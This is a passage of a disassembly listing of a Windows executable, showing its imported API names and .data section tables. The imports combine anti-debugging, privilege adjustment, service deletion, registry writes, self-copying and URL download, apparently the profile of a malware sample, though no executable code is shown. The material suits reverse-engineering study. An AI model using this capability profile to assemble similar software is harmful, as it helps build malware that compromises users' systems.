aDeletefilea db 'DeleteFileA',0
db 42h ; B
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
dd 69560384h, 61757472h, 6572466Ch, 784565h, 69560387h
dd 61757472h, 6F72506Ch, 74636574h, 7845h, 69560382h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2390000h
aIsdebuggerpres db 'IsDebuggerPresent',0
db '¹',0
aExitprocess db 'ExitProcess',0
dd 65470174h, 636F4C74h, 49656C61h, 416F666Eh, 2A30000h
aQueryperforman db 'QueryPerformanceCounter',0
aF db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 17Dh
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 10h
db 0A4h ; ¤
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 654701E9h, 72655674h, 6E6F6973h, 417845h, 72430053h
dd 65746165h, 656C6946h, 1630041h, 46746547h, 53656C69h
dd 657A69h, 6553031Bh, 6C694674h, 696F5065h, 7265746Eh
dd 2B50000h, 64616552h, 656C6946h, 3900000h
aWaitforsingleo db 'WaitForSingleObject',0
aC_0 db 'C',0
aCopyfilea db 'CopyFileA',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 0A4h ; ¤
db 3, 57h, 72h
aItefile db 'iteFile',0
db 'º',0
aExitthread db 'ExitThread',0
align 2
aO db 'o',0
aCreatethread db 'CreateThread',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
aO_0 db 'O',0
aCreateeventa db 'CreateEventA',0
align 2
dw 275h
aMultibytetowid db 'MultiByteToWideChar',0
dd 736C03CCh, 656C7274h, 416Eh, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1BA0000h, 64616F4Ch, 73727543h, 41726Fh, 694400A1h
dd 74617073h, 654D6863h, 67617373h, 4165h, 6544008Eh, 6E695766h
dd 50776F64h, 41636F72h, 600000h, 61657243h, 69576574h
dd 776F646Eh, 417845h, 725402AAh, 6C736E61h, 4D657461h
dd 61737365h, 6567h, 6F4C01BEh, 63496461h, 416E6Fh, 65520217h
dd 74736967h, 6C437265h, 45737361h, 4178h, 6547013Ah, 73654D74h
dd 65676173h, 10B0041h, 43746547h, 6F737275h, 736F5072h
dd 53550000h, 32335245h, 6C6C642Eh, 1AF0000h, 6E65704Fh
dd 76726553h, 41656369h, 3E0000h
aCloseserviceha db 'CloseServiceHandle',0
align 4
aP db '¯',0
aDeleteservice db 'DeleteService',0
dd 704F01B1h, 68546E65h, 64616572h, 656B6F54h, 14F006Eh
aLookupprivileg db 'LookupPrivilegeValueA',0
dw 132h
aImpersonatesel db 'ImpersonateSelf',0
db 0ECh ; ì
db 1, 52h, 65h
aGopenkeyexa db 'gOpenKeyExA',0
db 0C4h ; Ä
db 1, 51h, 75h
aEryservicestat db 'eryServiceStatusEx',0
align 4
dd 704F01ADh, 43536E65h, 616E614Dh, 41726567h, 1E10000h
dd 45676552h, 566D756Eh, 65756C61h, 420041h, 746E6F43h
dd 536C6F72h, 69767265h, 6563h, 655201DDh, 756E4567h, 79654B6Dh
dd 1C0041h
aAdjusttokenpri db 'AdjustTokenPrivileges',0
dw 1CBh
aRegclosekey db 'RegCloseKey',0
db 4
db 2, 52h, 65h
aGsetvalueexa db 'gSetValueExA',0
align 2
dw 1F7h
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
dw 1D1h
aRegcreatekeyex db 'RegCreateKeyExA',0
db 0D8h ; Ø
db 1, 52h, 65h
aGdeletevaluea db 'gDeleteValueA',0
dw 124h
aGetusernamea db 'GetUserNameA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
aOdbc32_dll db 'ODBC32.dll',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0
align 4
aU db '“',0
aInternetopenur db 'InternetOpenUrlA',0
align 10h
db 'š',0
aInternetreadfi db 'InternetReadFile',0
align 4
aT db '’',0
aInternetopena db 'InternetOpenA',0
aWininet_dll db 'WININET.dll',0
db 6
align 2
aWnetaddconnect db 'WNetAddConnection2A',0
aMpr_dll db 'MPR.dll',0
dw 21Ch
aHeapsize db 'HeapSize',0
align 2
dw 143h
aGetcurrentproc db 'GetCurrentProcessId',0
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 1CAh
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 65470110h, 6D6F4374h, 646E616Dh, 656E694Ch, 1B70041h
dd 53746547h, 74726174h, 6E497075h, 416F66h, 615202A7h
dd 45657369h, 70656378h, 6E6F6974h, 2D70000h, 556C7452h
dd 6E69776Eh, 1040064h, 43746547h, 666E4950h, 22C006Fh
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 228h
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 0FDh
aGetacp db 'GetACP',0
align 4
dd 65470193h, 4D454F74h, 5043h, 6C540365h, 74654773h, 756C6156h
dd 3630065h, 41736C54h, 636F6C6Ch, 3660000h, 53736C54h
dd 61567465h, 65756Ch, 6C540364h, 65724673h, 3280065h
dd 4C746553h, 45747361h, 726F7272h, 810000h
aDeletecritical db 'DeleteCriticalSection',0
dw 251h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aS_20 db '˜',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 214h
aHeapdestroy db 'HeapDestroy',0
dd 65480212h, 72437061h, 65746165h, 3830000h, 74726956h
dd 466C6175h, 656572h, 69560381h, 61757472h, 6C6C416Ch
dd 636Fh, 6548021Ah, 65527061h, 6F6C6C41h, 3240063h, 48746553h
dd 6C646E61h, 756F4365h, 746Eh, 654701B9h, 64745374h, 646E6148h
dd 656Ch, 65470166h, 6C694674h, 70795465h, 0F60065h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 0F7h ; ÷
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 394h
aWidechartomult db 'WideCharToMultiByte',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 244h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 245h
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1BAh
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701BDh, 72745374h, 54676E69h, 57657079h, 2230000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 122h
aGetconsolecp db 'GetConsoleCP',0
align 2
dw 133h
aGetconsolemode db 'GetConsoleMode',0
align 4
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_0 db 'î',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 99h ; ™
db 3, 57h, 72h
aIteconsolea db 'iteConsoleA',0
db 35h ; 5
db 1, 47h, 65h
aTconsoleoutput db 'tConsoleOutputCP',0
align 2
dw 3A3h
aWriteconsolew db 'WriteConsoleW',0
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
_rdata ends
; Section 3. (virtual address 00023000)
; Virtual size : 00011DFC ( 73212.)
; Section size in file : 00011DFC ( 73212.)
; Offset to raw data for section: 00023000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 423000h
dd offset aBadAllocation ; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
off_423008 dd offset off_41D38C ; DATA XREF: .rdata:00420D94�o
; .rdata:00420DBC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset aBadAllocation ; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
off_423030 dd offset off_41D38C ; DATA XREF: .rdata:00420DF8�o
; .rdata:00420E18�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
off_423048 dd offset aBadAllocation ; DATA XREF: sub_403032+3�o
; "bad allocation"
align 10h
dword_423050 dd 2 ; DATA XREF: sub_409AB4+42�r
; sub_409C54+19�r ...
align 10h
dd offset sub_40B11E
dword_423064 dd 0D7F8C91Eh ; DATA XREF: sub_401C1D+9�r
; sub_401CC0+C�r ...
dword_423068 dd 280736E1h ; DATA XREF: sub_40468E+AE�r
; sub_40B08A+29�w ...
align 10h
dword_423070 dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_4047C1+29�o
; sub_4049A0+63�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: sub_404C69+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h, 0
byte_423398 db 0 ; DATA XREF: sub_404C69+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_423498 dd 0BC2980h ; DATA XREF: sub_40271F+41�r
; sub_4049A0+4C�r ...
byte_42349C db 1 ; DATA XREF: sub_404ABE+E3�r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: sub_404ABE:loc_404AFA�r
dword_4234A4 dd 82798260h ; DATA XREF: sub_404ABE+12B�r
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: sub_404ABE+C6�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF40+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: sub_40271F+2C�r
; sub_40271F+4C�r ...
dword_423598 dd 43h, 0 ; DATA XREF: sub_404E21:loc_404F1E�o
; sub_404F61:loc_404FAC�o ...
dword_4235A0 dd 2, 15h dup(0) ; DATA XREF: sub_405073+28�o
; sub_4053B5+DA�o ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD40 ; DATA XREF: sub_40F17F+D�r
; sub_40F1FC+D�r ...
; " ((((( H"
dd offset dword_41E148+80h
dd offset dword_41E148+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: sub_40271F+24�r
; sub_4050B1+4E�r ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: sub_40A9EB+17�o
dd offset dword_423070
dword_423688 dd 0Eh ; DATA XREF: sub_405127+13�r
; sub_405193+13�r ...
dword_42368C dd 0Dh ; DATA XREF: sub_405127+1�r
; sub_405127+1E�r ...
dword_423690 dd 1 ; DATA XREF: sub_405798:loc_40579E�r
dword_423694 dd 16h ; DATA XREF: sub_405798:loc_4057B9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: sub_4057D3+9�o
dword_4237FC dd 8 ; DATA XREF: sub_4057E6+9�o
off_423800 dd offset dword_425E18 ; DATA XREF: sub_405881:loc_4058BE�w
; sub_4058CA+8�o ...
dword_423804 dd 1 ; DATA XREF: sub_405881:loc_40588A�r
dd offset dword_425E30
dd 1, 2 dup(0)
dd offset dword_425E48
dd 1, 425E60h, 1, 2 dup(0)
dd offset dword_425E78
dd 1, 425E90h, 1, 425EA8h, 1, 2 dup(0)
dd offset dword_425EC0
dd 1, 0BC44F0h, 0
dd offset dword_425ED8
dd 1, 425EF0h, 1, 425F08h, 1, 2 dup(0)
dd offset dword_425F20
dd 1, 425F38h, 1, 425F50h, 1, 0BC44D0h, 21h dup(0)
dword_423920 dd 10h ; DATA XREF: sub_4058CA+2A�o
; sub_4058CA+4A�o
off_423924 dd offset aNull ; DATA XREF: sub_4069D7:loc_406EC5�r
; sub_4069D7+7E7�r
; "(null)"
off_423928 dd offset aNull_0 ; DATA XREF: sub_4069D7+433�r
; "(null)"
align 10h
off_423930 dd offset sub_407AEA ; DATA XREF: sub_40785D+E�r
; sub_407B19+45�w
dd 3 dup(0)
dd offset aBadAllocation ; "bad allocation"
align 10h
off_423950 dd offset dword_433DC0 ; DATA XREF: sub_408084�o
; sub_40808A+52�o ...
align 8
dd offset dword_433DC0
dd 101h
dword_423960 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40808A+74�o
dd 1000h, 4 dup(0)
dd 2, 0FFFFFFFEh, 6 dup(0)
dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4239C0 dd 3, 0 ; DATA XREF: sub_40808A+A4�o
dd 1000h, 79h dup(0)
dword_423BB0 dd 8 dup(0) ; DATA XREF: sub_40815B+D�o
; sub_4081AD+D�o
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: sub_403207:loc_4032A3�o
; sub_403207:loc_4032E8�o ...
dword_423C00 dd 2 ; DATA XREF: sub_409AB4:loc_409AC0�r
off_423C04 dd offset aR6002FloatingP ; DATA XREF: sub_409AB4:loc_409BE4�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DA94h, 9, 41DA68h, 0Ah, 41D9D0h, 10h, 41D9A4h
dd 11h, 41D974h, 12h, 41D950h, 13h, 41D924h, 18h, 41D8ECh
dd 19h, 41D8C4h, 1Ah, 41D88Ch, 1Bh, 41D854h, 1Ch, 41D82Ch
dd 1Eh, 41D80Ch, 1Fh, 41D7A8h, 20h, 41D770h, 21h, 41D678h
dd 22h, 41D5D8h, 78h, 41D5C8h, 79h, 41D5B8h, 7Ah, 41D5A8h
dd 0FCh, 41D5A4h, 0FFh, 41D594h
byte_423CB8 db 0 ; DATA XREF: sub_409DAD:loc_40A10E�r
; sub_409DAD+36F�r
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: sub_40A6EF+D�r
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_405266+1D�o
; sub_4053B5+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: sub_40AA15+A1�r
; sub_40AA15+C0�r ...
dword_423E3C dd 7 ; DATA XREF: sub_40AA15+A7�r
; sub_40AA15+C6�r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: sub_40AA15+22�r
; sub_40DCE8+4�r
dd offset aBadAllocation ; "bad allocation"
dd offset sub_40B11E
off_423E50 dd offset off_41D38C ; DATA XREF: sub_40BA07+128�o
; .rdata:00420E40�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD40 ; " ((((( H"
dd offset dword_41DF40+2
off_423E78 dd offset aSun ; DATA XREF: sub_404E21+D9�o
; .data:00423674�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E148+300h
dd 409h, 2 dup(1), 423E78h
dword_423F34 dd 2Eh ; DATA XREF: .data:off_423F38�o
off_423F38 dd offset dword_423F34 ; DATA XREF: sub_404E21+14�o
; sub_40C6C4+B�r ...
off_423F3C dd offset dword_426418 ; DATA XREF: sub_40C6C4+1D�r
off_423F40 dd offset dword_426418 ; DATA XREF: sub_40C6C4+2F�r
off_423F44 dd offset dword_426418 ; DATA XREF: sub_40C704+C�r
off_423F48 dd offset dword_426418 ; DATA XREF: sub_40C704+1E�r
off_423F4C dd offset dword_426418 ; DATA XREF: sub_40C704+30�r
off_423F50 dd offset dword_426418 ; DATA XREF: sub_40C704+42�r
off_423F54 dd offset dword_426418 ; DATA XREF: sub_40C704+54�r
off_423F58 dd offset dword_426418 ; DATA XREF: sub_40C704+66�r
off_423F5C dd offset dword_426418 ; DATA XREF: sub_40C704+78�r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset sub_41134A ; DATA XREF: sub_40D59E:loc_40D5A2�r
; sub_40F70B+5�w
off_423F84 dd offset sub_410A46 ; DATA XREF: sub_40F70B+A�w
off_423F88 dd offset sub_410A04 ; DATA XREF: sub_40F70B+14�w
off_423F8C dd offset sub_410A38 ; DATA XREF: sub_40F70B+1E�w
off_423F90 dd offset word_4109AE ; DATA XREF: sub_40F70B+28�w
off_423F94 dd offset sub_41134A ; DATA XREF: sub_40F70B+32�w
off_423F98 dd offset sub_4112C4 ; DATA XREF: sub_4069D7+61A�r
; sub_40F70B+37�w
off_423F9C dd offset sub_4109C4 ; DATA XREF: sub_408E67+5F1�r
; sub_40F70B+41�w
off_423FA0 dd offset sub_41092E ; DATA XREF: sub_4069D7+65F�r
; sub_40F70B+4B�w
off_423FA4 dd offset sub_4108BD ; DATA XREF: sub_4069D7+640�r
; sub_40F70B+55�w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40EC54+2�o
; sub_40EC5D+2�o
dword_423FC0 dd 2694h ; DATA XREF: sub_40FDF4+3�r
; sub_40FE47+5D�r
dd 9875h, 9873h, 0
dword_423FD0 dd 14h ; DATA XREF: sub_40FD56:loc_40FD5E�r
off_423FD4 dd offset aExp ; DATA XREF: sub_40FD56:loc_40FDCE�r
; "exp"
dd 1Dh, 41DC18h, 1Ah, 41DC08h, 1Bh, 41DC0Ch, 1Fh, 41EE10h
dd 13h, 41EE08h, 21h, 41EE00h, 0Eh, 41DC00h, 0Dh, 41DBF8h
dd 0Fh, 41DBDCh, 10h, 41EDF8h, 5, 41EDF0h, 1Eh, 41DBC0h
dd 12h, 41DBBCh, 20h, 41DBB8h, 0Ch, 41DBD4h, 0Bh, 41DBCCh
dd 15h, 41EDE8h, 1Ch, 41DBC4h, 19h, 41EDE0h, 11h, 41EDD8h
dd 18h, 41EDD0h, 16h, 41EDC8h, 17h, 41EDC0h, 22h, 41EDBCh
dd 23h, 41EDB8h, 24h, 41EDB4h, 25h, 41EDACh, 26h, 41EDA0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20:loc_40FBF0�r
; sub_40FB20:loc_40FBF8�r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20+89�r
; sub_40FB20+A4�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: sub_410084+B�r
; sub_410084+1E�r
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410084+30�r
align 4
dword_4240F8 dd 1 ; DATA XREF: sub_4100DA+1C�r
; sub_4100DA+4C�w
byte_4240FC db 3 ; DATA XREF: sub_4101BD+1B�r
; sub_4101BD:loc_4101FB�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:00424190�o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:00424194�o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: sub_4104DC+13�r
; sub_4104DC+4F�r ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: sub_41144A:loc_411463�r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: sub_4104DC+1B�r
; sub_4104DC:loc_410505�r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411969:loc_411D0D�r
; sub_411969+44D�r
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411969:loc_411AD8�r
dword_424238 dd 35h ; DATA XREF: sub_411969+78�r
; sub_411969+176�r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411969:loc_411C74�r
; sub_411969+3AA�r ...
dword_424240 dd 40h ; DATA XREF: sub_411969+519�r
dword_424244 dd 3FFh ; DATA XREF: sub_411969+452�r
; sub_411969:loc_411DCC�r
dword_424248 dd 80h ; DATA XREF: sub_411EAB:loc_41224F�r
; sub_411EAB+44D�r
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_411EAB:loc_41201A�r
dword_424250 dd 18h ; DATA XREF: sub_411EAB+78�r
; sub_411EAB+176�r ...
dword_424254 dd 8 ; DATA XREF: sub_411EAB:loc_4121B6�r
; sub_411EAB+3AA�r ...
dword_424258 dd 20h ; DATA XREF: sub_411EAB+519�r
dword_42425C dd 7Fh ; DATA XREF: sub_411EAB+452�r
; sub_411EAB:loc_41230E�r
dword_424260 dd 2 dup(0) ; DATA XREF: sub_4123ED+363�o
; sub_412AB1+18E�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4123ED+37A�o
; sub_412AB1+1B3�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocatio_0 ; "bad allocation"
dd offset aBadAllocatio_1 ; "bad allocation"
dword_424528 dd 4Eh ; DATA XREF: sub_401F1C+81�o
; sub_401F1C+C8�r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_401F1C+3FE�r
; sub_40251A+77�r ...
dword_42454C dd 0 ; DATA XREF: sub_40251A:loc_40256B�r
; sub_41A8D5+E8�r ...
off_424550 dd offset sub_41A9DE ; DATA XREF: sub_413A2D+20C�r
; sub_413A2D+31D�r ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B1A0
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41A8D5
dd 0Bh dup(0)
dd offset aBadAllocatio_2 ; "bad allocation"
dword_4245DC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41A5C1+205�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 0
dword_424604 dd 6EB4141h, 501E100Dh, 6D6Dh, 41EF94h ; DATA XREF: sub_41A5C1+2B4�o
dword_424614 dd 5C0D0A00h, 2E2F5Fh ; DATA XREF: sub_41A9DE+4A3�o
dword_42461C dd 0EFFFC481h, 44FFFFh, 41EFA4h ; DATA XREF: sub_41A9DE+321�o
